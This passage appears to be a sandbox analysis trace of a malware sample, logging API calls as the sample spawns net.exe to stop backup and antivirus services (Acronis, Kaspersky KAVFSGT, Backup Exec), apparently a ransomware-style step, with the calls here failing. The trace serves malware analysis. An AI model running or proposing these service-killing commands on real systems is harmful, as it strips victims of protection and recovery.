LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0200.821] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x1eb338, nSize=0x800, Arguments=0x1e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0200.822] GetFileType (hFile=0x26c) returned 0x3 [0200.822] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x684000 [0200.822] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x684000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0200.822] WriteFile (in: hFile=0x26c, lpBuffer=0x684000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x18f758, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f758, lpOverlapped=0x0) returned 0 [0200.822] LocalFree (hMem=0x684000) returned 0x0 [0200.822] GetFileType (hFile=0x26c) returned 0x3 [0200.822] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6862a8 [0200.822] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6862a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nh", lpUsedDefaultChar=0x0) returned 2 [0200.822] WriteFile (in: hFile=0x26c, lpBuffer=0x6862a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f758, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f758, lpOverlapped=0x0) returned 0 [0200.823] LocalFree (hMem=0x6862a8) returned 0x0 [0200.823] _ultow (in: _Dest=0x889, _Radix=1636232 | out: _Dest=0x889) returned="2185" [0200.823] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x1eb338, nSize=0x800, Arguments=0x1e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0200.823] GetFileType (hFile=0x26c) returned 0x3 [0200.823] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6862a8 [0200.823] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6862a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0200.823] WriteFile (in: hFile=0x26c, lpBuffer=0x6862a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x18f764, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f764, lpOverlapped=0x0) returned 0 [0200.823] LocalFree (hMem=0x6862a8) returned 0x0 [0200.823] GetFileType (hFile=0x26c) returned 0x3 [0200.823] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6862a8 [0200.823] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6862a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nh", lpUsedDefaultChar=0x0) returned 2 [0200.823] WriteFile (in: hFile=0x26c, lpBuffer=0x6862a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f764, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f764, lpOverlapped=0x0) returned 0 [0200.823] LocalFree (hMem=0x6862a8) returned 0x0 [0200.824] NetApiBufferFree (Buffer=0x681c70) returned 0x0 [0200.824] NetApiBufferFree (Buffer=0x681c88) returned 0x0 [0200.824] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcronisAgent /y" [0200.824] exit (_Code=2) Process: id = "174" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x50c77000" os_pid = "0x2ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop KAVFSGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 347 os_tid = 0x874 Process: id = "175" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x69920000" os_pid = "0x81c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "174" os_parent_pid = "0x2ec" cmd_line = "C:\\Windows\\system32\\net1 stop KAVFSGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 348 os_tid = 0x544 [0200.999] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfc80 | out: lpSystemTimeAsFileTime=0xdfc80*(dwLowDateTime=0x40fedda0, dwHighDateTime=0x1d57a87)) [0200.999] GetCurrentProcessId () returned 0x81c [0200.999] GetCurrentThreadId () returned 0x544 [0200.999] GetTickCount () returned 0x116be41 [0200.999] QueryPerformanceCounter (in: lpPerformanceCount=0xdfc78 | out: lpPerformanceCount=0xdfc78*=32128333893) returned 1 [0200.999] GetModuleHandleA (lpModuleName=0x0) returned 0xbd0000 [0200.999] __set_app_type (_Type=0x1) [0200.999] __p__fmode () returned 0x74eb31f4 [0200.999] __p__commode () returned 0x74eb31fc [0200.999] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbdffe6) returned 0x0 [0200.999] __getmainargs (in: _Argc=0xbe9064, _Argv=0xbe906c, _Env=0xbe9068, _DoWildCard=0, _StartInfo=0xbe9024 | out: _Argc=0xbe9064, _Argv=0xbe906c, _Env=0xbe9068) returned 0 [0200.999] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0200.999] GetConsoleOutputCP () returned 0x1b5 [0201.000] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xbe9080 | out: lpCPInfo=0xbe9080) returned 1 [0201.000] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.003] sprintf_s (in: _DstBuf=0xdfc38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0201.003] setlocale (category=0, locale=".437") returned="English_United States.437" [0201.005] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0201.005] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0201.005] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFSGT /y" [0201.005] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdfa04, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0201.005] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x62) returned 0x4c3c00 [0201.005] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0201.005] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfc08 | out: Buffer=0xdfc08*=0x4c1c60) returned 0x0 [0201.005] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfc08 | out: Buffer=0xdfc08*=0x4c1c78) returned 0x0 [0201.005] _fileno (_File=0x74eb2900) returned -2 [0201.005] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0201.006] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0201.006] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0201.006] _wcsicmp (_String1="config", _String2="stop") returned -16 [0201.006] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0201.006] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0201.006] _wcsicmp (_String1="file", _String2="stop") returned -13 [0201.006] _wcsicmp (_String1="files", _String2="stop") returned -13 [0201.006] _wcsicmp (_String1="group", _String2="stop") returned -12 [0201.006] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0201.006] _wcsicmp (_String1="help", _String2="stop") returned -11 [0201.006] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0201.006] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0201.006] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0201.006] _wcsicmp (_String1="session", _String2="stop") returned -15 [0201.006] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0201.006] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0201.006] _wcsicmp (_String1="share", _String2="stop") returned -12 [0201.006] _wcsicmp (_String1="start", _String2="stop") returned -14 [0201.006] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0201.006] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0201.006] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0201.006] _wcsicmp (_String1="accounts", _String2="KAVFSGT") returned -10 [0201.006] _wcsicmp (_String1="computer", _String2="KAVFSGT") returned -8 [0201.006] _wcsicmp (_String1="config", _String2="KAVFSGT") returned -8 [0201.006] _wcsicmp (_String1="continue", _String2="KAVFSGT") returned -8 [0201.006] _wcsicmp (_String1="cont", _String2="KAVFSGT") returned -8 [0201.006] _wcsicmp (_String1="file", _String2="KAVFSGT") returned -5 [0201.006] _wcsicmp (_String1="files", _String2="KAVFSGT") returned -5 [0201.006] _wcsicmp (_String1="group", _String2="KAVFSGT") returned -4 [0201.006] _wcsicmp (_String1="groups", _String2="KAVFSGT") returned -4 [0201.006] _wcsicmp (_String1="help", _String2="KAVFSGT") returned -3 [0201.006] _wcsicmp (_String1="helpmsg", _String2="KAVFSGT") returned -3 [0201.006] _wcsicmp (_String1="localgroup", _String2="KAVFSGT") returned 1 [0201.006] _wcsicmp (_String1="pause", _String2="KAVFSGT") returned 5 [0201.006] _wcsicmp (_String1="session", _String2="KAVFSGT") returned 8 [0201.006] _wcsicmp (_String1="sessions", _String2="KAVFSGT") returned 8 [0201.006] _wcsicmp (_String1="sess", _String2="KAVFSGT") returned 8 [0201.007] _wcsicmp (_String1="share", _String2="KAVFSGT") returned 8 [0201.007] _wcsicmp (_String1="start", _String2="KAVFSGT") returned 8 [0201.007] _wcsicmp (_String1="stats", _String2="KAVFSGT") returned 8 [0201.007] _wcsicmp (_String1="statistics", _String2="KAVFSGT") returned 8 [0201.007] _wcsicmp (_String1="stop", _String2="KAVFSGT") returned 8 [0201.007] _wcsicmp (_String1="time", _String2="KAVFSGT") returned 9 [0201.007] _wcsicmp (_String1="user", _String2="KAVFSGT") returned 10 [0201.007] _wcsicmp (_String1="users", _String2="KAVFSGT") returned 10 [0201.007] _wcsicmp (_String1="msg", _String2="KAVFSGT") returned 2 [0201.007] _wcsicmp (_String1="messenger", _String2="KAVFSGT") returned 2 [0201.007] _wcsicmp (_String1="receiver", _String2="KAVFSGT") returned 7 [0201.007] _wcsicmp (_String1="rcv", _String2="KAVFSGT") returned 7 [0201.007] _wcsicmp (_String1="netpopup", _String2="KAVFSGT") returned 3 [0201.007] _wcsicmp (_String1="redirector", _String2="KAVFSGT") returned 7 [0201.007] _wcsicmp (_String1="redir", _String2="KAVFSGT") returned 7 [0201.007] _wcsicmp (_String1="rdr", _String2="KAVFSGT") returned 7 [0201.007] _wcsicmp (_String1="workstation", _String2="KAVFSGT") returned 12 [0201.007] _wcsicmp (_String1="work", _String2="KAVFSGT") returned 12 [0201.007] _wcsicmp (_String1="wksta", _String2="KAVFSGT") returned 12 [0201.007] _wcsicmp (_String1="prdr", _String2="KAVFSGT") returned 5 [0201.007] _wcsicmp (_String1="devrdr", _String2="KAVFSGT") returned -7 [0201.007] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFSGT") returned 1 [0201.007] _wcsicmp (_String1="server", _String2="KAVFSGT") returned 8 [0201.007] _wcsicmp (_String1="svr", _String2="KAVFSGT") returned 8 [0201.007] _wcsicmp (_String1="srv", _String2="KAVFSGT") returned 8 [0201.007] _wcsicmp (_String1="lanmanserver", _String2="KAVFSGT") returned 1 [0201.007] _wcsicmp (_String1="alerter", _String2="KAVFSGT") returned -10 [0201.007] _wcsicmp (_String1="netlogon", _String2="KAVFSGT") returned 3 [0201.007] _wcsupr (in: _String="KAVFSGT" | out: _String="KAVFSGT") returned="KAVFSGT" [0201.008] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4c54b8 [0201.010] GetServiceKeyNameW (in: hSCManager=0x4c54b8, lpDisplayName="KAVFSGT", lpServiceName=0xbeaaf0, lpcchBuffer=0xdfba4 | out: lpServiceName="", lpcchBuffer=0xdfba4) returned 0 [0201.011] _wcsicmp (_String1="msg", _String2="KAVFSGT") returned 2 [0201.011] _wcsicmp (_String1="messenger", _String2="KAVFSGT") returned 2 [0201.011] _wcsicmp (_String1="receiver", _String2="KAVFSGT") returned 7 [0201.011] _wcsicmp (_String1="rcv", _String2="KAVFSGT") returned 7 [0201.011] _wcsicmp (_String1="redirector", _String2="KAVFSGT") returned 7 [0201.011] _wcsicmp (_String1="redir", _String2="KAVFSGT") returned 7 [0201.011] _wcsicmp (_String1="rdr", _String2="KAVFSGT") returned 7 [0201.011] _wcsicmp (_String1="workstation", _String2="KAVFSGT") returned 12 [0201.011] _wcsicmp (_String1="work", _String2="KAVFSGT") returned 12 [0201.011] _wcsicmp (_String1="wksta", _String2="KAVFSGT") returned 12 [0201.011] _wcsicmp (_String1="prdr", _String2="KAVFSGT") returned 5 [0201.011] _wcsicmp (_String1="devrdr", _String2="KAVFSGT") returned -7 [0201.011] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFSGT") returned 1 [0201.011] _wcsicmp (_String1="server", _String2="KAVFSGT") returned 8 [0201.011] _wcsicmp (_String1="svr", _String2="KAVFSGT") returned 8 [0201.011] _wcsicmp (_String1="srv", _String2="KAVFSGT") returned 8 [0201.011] _wcsicmp (_String1="lanmanserver", _String2="KAVFSGT") returned 1 [0201.011] _wcsicmp (_String1="alerter", _String2="KAVFSGT") returned -10 [0201.011] _wcsicmp (_String1="netlogon", _String2="KAVFSGT") returned 3 [0201.011] NetServiceControl (in: servername=0x0, service="KAVFSGT", opcode=0x0, arg=0x0, bufptr=0xdfba0 | out: bufptr=0xdfba0) returned 0x889 [0201.012] wcscpy_s (in: _Destination=0xbea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0201.012] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0201.013] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xbeb338, nSize=0x800, Arguments=0xbe9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0201.014] GetFileType (hFile=0x26c) returned 0x3 [0201.014] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4c3fe8 [0201.014] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4c3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0201.014] WriteFile (in: hFile=0x26c, lpBuffer=0x4c3fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xdfae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdfae0, lpOverlapped=0x0) returned 0 [0201.014] LocalFree (hMem=0x4c3fe8) returned 0x0 [0201.014] GetFileType (hFile=0x26c) returned 0x3 [0201.014] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4c6290 [0201.014] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4c6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nL", lpUsedDefaultChar=0x0) returned 2 [0201.014] WriteFile (in: hFile=0x26c, lpBuffer=0x4c6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdfae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdfae0, lpOverlapped=0x0) returned 0 [0201.014] LocalFree (hMem=0x4c6290) returned 0x0 [0201.014] _ultow (in: _Dest=0x889, _Radix=916240 | out: _Dest=0x889) returned="2185" [0201.014] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xbeb338, nSize=0x800, Arguments=0xbe9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0201.014] GetFileType (hFile=0x26c) returned 0x3 [0201.014] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4c6290 [0201.014] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4c6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0201.014] WriteFile (in: hFile=0x26c, lpBuffer=0x4c6290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xdfaec, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdfaec, lpOverlapped=0x0) returned 0 [0201.014] LocalFree (hMem=0x4c6290) returned 0x0 [0201.014] GetFileType (hFile=0x26c) returned 0x3 [0201.014] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4c6290 [0201.015] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4c6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nL", lpUsedDefaultChar=0x0) returned 2 [0201.015] WriteFile (in: hFile=0x26c, lpBuffer=0x4c6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdfaec, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdfaec, lpOverlapped=0x0) returned 0 [0201.015] LocalFree (hMem=0x4c6290) returned 0x0 [0201.015] NetApiBufferFree (Buffer=0x4c1c60) returned 0x0 [0201.015] NetApiBufferFree (Buffer=0x4c1c78) returned 0x0 [0201.015] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFSGT /y" [0201.015] exit (_Code=2) Process: id = "176" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5917c000" os_pid = "0x548" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop BackupExecDeviceMediaService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 349 os_tid = 0x614 Process: id = "177" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x22a07000" os_pid = "0x93c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "176" os_parent_pid = "0x548" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecDeviceMediaService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 350 os_tid = 0x260 [0201.145] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fcfc | out: lpSystemTimeAsFileTime=0x30fcfc*(dwLowDateTime=0x41144a00, dwHighDateTime=0x1d57a87)) [0201.146] GetCurrentProcessId () returned 0x93c [0201.146] GetCurrentThreadId () returned 0x260 [0201.146] GetTickCount () returned 0x116becd [0201.146] QueryPerformanceCounter (in: lpPerformanceCount=0x30fcf4 | out: lpPerformanceCount=0x30fcf4*=32143027622) returned 1 [0201.146] GetModuleHandleA (lpModuleName=0x0) returned 0x1e0000 [0201.146] __set_app_type (_Type=0x1) [0201.146] __p__fmode () returned 0x74eb31f4 [0201.146] __p__commode () returned 0x74eb31fc [0201.146] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1effe6) returned 0x0 [0201.146] __getmainargs (in: _Argc=0x1f9064, _Argv=0x1f906c, _Env=0x1f9068, _DoWildCard=0, _StartInfo=0x1f9024 | out: _Argc=0x1f9064, _Argv=0x1f906c, _Env=0x1f9068) returned 0 [0201.146] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.146] GetConsoleOutputCP () returned 0x1b5 [0201.147] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x1f9080 | out: lpCPInfo=0x1f9080) returned 1 [0201.147] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.150] sprintf_s (in: _DstBuf=0x30fcb4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0201.150] setlocale (category=0, locale=".437") returned="English_United States.437" [0201.152] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0201.152] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0201.152] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecDeviceMediaService /y" [0201.152] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30fa80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0201.152] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x8c) returned 0x334c00 [0201.152] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0201.152] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fc84 | out: Buffer=0x30fc84*=0x331c98) returned 0x0 [0201.152] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fc84 | out: Buffer=0x30fc84*=0x331cb0) returned 0x0 [0201.152] _fileno (_File=0x74eb2900) returned -2 [0201.152] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0201.152] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0201.152] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0201.152] _wcsicmp (_String1="config", _String2="stop") returned -16 [0201.152] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0201.153] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0201.153] _wcsicmp (_String1="file", _String2="stop") returned -13 [0201.153] _wcsicmp (_String1="files", _String2="stop") returned -13 [0201.153] _wcsicmp (_String1="group", _String2="stop") returned -12 [0201.153] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0201.153] _wcsicmp (_String1="help", _String2="stop") returned -11 [0201.153] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0201.153] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0201.153] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0201.153] _wcsicmp (_String1="session", _String2="stop") returned -15 [0201.153] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0201.153] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0201.153] _wcsicmp (_String1="share", _String2="stop") returned -12 [0201.153] _wcsicmp (_String1="start", _String2="stop") returned -14 [0201.153] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0201.153] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0201.153] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0201.153] _wcsicmp (_String1="accounts", _String2="BackupExecDeviceMediaService") returned -1 [0201.153] _wcsicmp (_String1="computer", _String2="BackupExecDeviceMediaService") returned 1 [0201.153] _wcsicmp (_String1="config", _String2="BackupExecDeviceMediaService") returned 1 [0201.153] _wcsicmp (_String1="continue", _String2="BackupExecDeviceMediaService") returned 1 [0201.153] _wcsicmp (_String1="cont", _String2="BackupExecDeviceMediaService") returned 1 [0201.153] _wcsicmp (_String1="file", _String2="BackupExecDeviceMediaService") returned 4 [0201.153] _wcsicmp (_String1="files", _String2="BackupExecDeviceMediaService") returned 4 [0201.153] _wcsicmp (_String1="group", _String2="BackupExecDeviceMediaService") returned 5 [0201.153] _wcsicmp (_String1="groups", _String2="BackupExecDeviceMediaService") returned 5 [0201.153] _wcsicmp (_String1="help", _String2="BackupExecDeviceMediaService") returned 6 [0201.153] _wcsicmp (_String1="helpmsg", _String2="BackupExecDeviceMediaService") returned 6 [0201.153] _wcsicmp (_String1="localgroup", _String2="BackupExecDeviceMediaService") returned 10 [0201.153] _wcsicmp (_String1="pause", _String2="BackupExecDeviceMediaService") returned 14 [0201.153] _wcsicmp (_String1="session", _String2="BackupExecDeviceMediaService") returned 17 [0201.153] _wcsicmp (_String1="sessions", _String2="BackupExecDeviceMediaService") returned 17 [0201.153] _wcsicmp (_String1="sess", _String2="BackupExecDeviceMediaService") returned 17 [0201.153] _wcsicmp (_String1="share", _String2="BackupExecDeviceMediaService") returned 17 [0201.153] _wcsicmp (_String1="start", _String2="BackupExecDeviceMediaService") returned 17 [0201.153] _wcsicmp (_String1="stats", _String2="BackupExecDeviceMediaService") returned 17 [0201.154] _wcsicmp (_String1="statistics", _String2="BackupExecDeviceMediaService") returned 17 [0201.154] _wcsicmp (_String1="stop", _String2="BackupExecDeviceMediaService") returned 17 [0201.154] _wcsicmp (_String1="time", _String2="BackupExecDeviceMediaService") returned 18 [0201.154] _wcsicmp (_String1="user", _String2="BackupExecDeviceMediaService") returned 19 [0201.154] _wcsicmp (_String1="users", _String2="BackupExecDeviceMediaService") returned 19 [0201.154] _wcsicmp (_String1="msg", _String2="BackupExecDeviceMediaService") returned 11 [0201.154] _wcsicmp (_String1="messenger", _String2="BackupExecDeviceMediaService") returned 11 [0201.154] _wcsicmp (_String1="receiver", _String2="BackupExecDeviceMediaService") returned 16 [0201.154] _wcsicmp (_String1="rcv", _String2="BackupExecDeviceMediaService") returned 16 [0201.154] _wcsicmp (_String1="netpopup", _String2="BackupExecDeviceMediaService") returned 12 [0201.154] _wcsicmp (_String1="redirector", _String2="BackupExecDeviceMediaService") returned 16 [0201.154] _wcsicmp (_String1="redir", _String2="BackupExecDeviceMediaService") returned 16 [0201.154] _wcsicmp (_String1="rdr", _String2="BackupExecDeviceMediaService") returned 16 [0201.154] _wcsicmp (_String1="workstation", _String2="BackupExecDeviceMediaService") returned 21 [0201.154] _wcsicmp (_String1="work", _String2="BackupExecDeviceMediaService") returned 21 [0201.154] _wcsicmp (_String1="wksta", _String2="BackupExecDeviceMediaService") returned 21 [0201.154] _wcsicmp (_String1="prdr", _String2="BackupExecDeviceMediaService") returned 14 [0201.154] _wcsicmp (_String1="devrdr", _String2="BackupExecDeviceMediaService") returned 2 [0201.154] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecDeviceMediaService") returned 10 [0201.154] _wcsicmp (_String1="server", _String2="BackupExecDeviceMediaService") returned 17 [0201.154] _wcsicmp (_String1="svr", _String2="BackupExecDeviceMediaService") returned 17 [0201.154] _wcsicmp (_String1="srv", _String2="BackupExecDeviceMediaService") returned 17 [0201.154] _wcsicmp (_String1="lanmanserver", _String2="BackupExecDeviceMediaService") returned 10 [0201.154] _wcsicmp (_String1="alerter", _String2="BackupExecDeviceMediaService") returned -1 [0201.154] _wcsicmp (_String1="netlogon", 